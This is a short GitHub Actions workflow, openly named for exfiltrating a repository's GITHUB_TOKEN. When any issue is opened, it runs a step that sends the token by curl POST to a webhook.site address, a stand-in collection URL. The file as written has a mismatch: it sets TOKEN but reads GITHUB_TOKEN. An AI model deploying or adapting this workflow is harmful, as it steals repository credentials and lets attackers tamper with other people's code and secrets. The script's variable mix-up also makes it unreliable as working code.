name: GITHUB_TOKEN exfiltration via Issue

on:
  issues:
    types: [opened]

jobs:
  steal_github_token:
    runs-on: ubuntu-latest
    steps:
      - name: Send GITHUB_TOKEN to webhook
        env:
          TOKEN: ${{ github.token }}
        run: |
          if [ -z "$GITHUB_TOKEN" ]; then
            echo " No token found"
          else
            echo " Token is present, trying to send..."
            curl -X POST https://webhook.site/your-id \
              --data-urlencode "token=$GITHUB_TOKEN"
          fi

